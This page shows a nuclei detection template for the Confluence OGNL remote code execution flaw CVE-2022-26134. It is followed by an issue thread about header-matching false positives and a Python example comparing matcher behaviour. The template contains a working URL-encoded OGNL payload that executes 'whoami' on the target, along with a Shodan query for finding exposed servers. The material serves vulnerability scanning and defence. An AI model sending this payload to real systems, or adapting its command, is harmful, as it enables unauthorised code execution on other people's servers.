nuclei-templates
CVE-2022-26134
Template Information:
CVE-2022-26134 Confluence - OGNL Remote Code Execution
reference:
- https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
- https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
- https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
- https://jira.atlassian.com/browse/CONFSERVER-79016
Nuclei Template:
id: CVE-2022-26134

info:
  name: Confluence - OGNL Remote Code Execution
  author: gh0st
  severity: critical
  description: |
    Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability.
  reference:
    - https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
    - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
    - https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
    - https://jira.atlassian.com/browse/CONFSERVER-79016
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-26134
    cwe-id: CWE-74
  metadata:
    shodan-query: http.component:"Atlassian Confluence"
    verified: "true"
  tags: cve,cve2022,confluence,rce,ognl,oast,kev

requests:
  - method: GET
    path:
      - "{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/"
    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "X-Cmd-Response"
Hi team, the currently existing CVE-2022-26134.yaml file is not working properly. I have rewritten this PoC and hope it can be updated, thanks.
Hello @BetterDefender, we apologize for the longer-than-usual response time regarding this issue. We appreciate the time and effort you took to create it. The team will review it shortly. Cheers! 🍻
Hi team, the currently existing CVE-2021-24351.yaml file is not working properly. I have rewritten this PoC and hope it can be updated, thanks.
Hello @BetterDefender, can you please specify which template you are facing an issue with? The issue you have created is for CVE-2022-26134 - Confluence - OGNL Remote Code Execution, which is a duplicate of this template. Also, in your above comment you have mentioned CVE-2021-24351.
Sorry, I said the wrong CVE number in my previous reply, the one that needs to be changed is CVE-2022-26134.yaml.
Can you mention the issues you are facing with the current template we have? Surely, we'll help you with that.
Since it's been so long, it's a bit hard for me to remember, but the payload used in the PoC for the vulnerability would add X-Cmd-Response to the response header. When matching, it matches lowercase letters, which led to false positives when I was testing the site with the vulnerability; after modifying the YAML content, the vulnerability was successfully detected.
Hello @BetterDefender, we have tried replicating this issue, and this should not cause any false positive results, because the DSL matcher is working as intended by changing the response header matcher into lower case, contains(to_lower(header_1), "x-cmd-response:"), and showing the result as expected.
I actually did experience a false alarm for that reason, so I submitted a question about it, and I'll keep you posted if I encounter it again in the future, thanks for the reply!
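The disagreement above comes down to how the response header is matched: the rewritten template uses a `word` matcher with `part: header`, while the maintainers point to the DSL expression `contains(to_lower(header_1), "x-cmd-response:")`. The following is an added example, not code from the nuclei-templates project or from either participant. It approximates the two matching strategies in plain Python (the `word` matcher as a case-sensitive substring search over the header block, the DSL expression as a lower-cased substring search; both semantics are my assumptions, not the nuclei implementation) and runs them over constructed sample responses, including one whose header names have been lower-cased the way an HTTP/2 front end or proxy would emit them. HTTP field names are case-insensitive, so a proper header lookup compares names without regard to case; that lookup is included as the reference point.

```python
from __future__ import annotations

# Added example (not from the nuclei-templates project): compare two ways of
# matching a response header. Header-field names are case-insensitive in HTTP
# (RFC 9110), so a matcher that compares them case-sensitively behaves
# differently from one that lower-cases the header block first.


def split_response(raw: str) -> tuple[str, str]:
    """Split a raw HTTP/1.1 response into (header block, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    return head, body


def word_matcher_header(raw: str, words: list[str]) -> bool:
    """Assumed semantics of a nuclei `word` matcher with part: header:
    case-sensitive substring search restricted to the header block."""
    head, _ = split_response(raw)
    return any(w in head for w in words)


def dsl_lower_matcher(raw: str, needle: str = "x-cmd-response:") -> bool:
    """Assumed semantics of contains(to_lower(header_1), "x-cmd-response:"):
    lower-case the header block, then do a substring search."""
    head, _ = split_response(raw)
    return needle in head.lower()


def header_value(raw: str, name: str) -> str | None:
    """Reference lookup: parse header lines and compare field names case-insensitively."""
    head, _ = split_response(raw)
    for line in head.split("\r\n")[1:]:  # skip the status line
        field, sep, value = line.partition(":")
        if sep and field.strip().lower() == name.lower():
            return value.strip()
    return None


# Constructed sample responses (not captured traffic).
SAMPLES = {
    "mixed_case": "HTTP/1.1 302 Found\r\nX-Cmd-Response: confluence\r\nContent-Length: 0\r\n\r\n",
    # The same header as re-emitted by a proxy or HTTP/2 front end that lower-cases field names.
    "lower_case": "HTTP/1.1 302 Found\r\nx-cmd-response: confluence\r\nContent-Length: 0\r\n\r\n",
    # Header absent; the marker appears only in the body (e.g. a page echoing the probe string).
    "body_only": "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<p>X-Cmd-Response</p>",
    "clean": "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<p>hello</p>",
}


def compare_matchers() -> dict[str, dict[str, bool]]:
    """Run both matchers and the reference lookup over every sample; return verdicts side by side."""
    return {
        label: {
            "word_header": word_matcher_header(raw, ["X-Cmd-Response"]),
            "dsl_to_lower": dsl_lower_matcher(raw),
            "header_present": header_value(raw, "X-Cmd-Response") is not None,
        }
        for label, raw in SAMPLES.items()
    }


if __name__ == "__main__":
    for label, verdicts in compare_matchers().items():
        print(f"{label:11s} {verdicts}")
```

Both strategies ignore the marker when it appears only in the body, so `part: header` scoping alone rules out that kind of false positive. They differ on the lower-cased response: the case-sensitive `word` matcher misses it, while the `to_lower` DSL form agrees with the reference header lookup, which is the behaviour a detection template wants when the scanned host sits behind infrastructure that normalises header case.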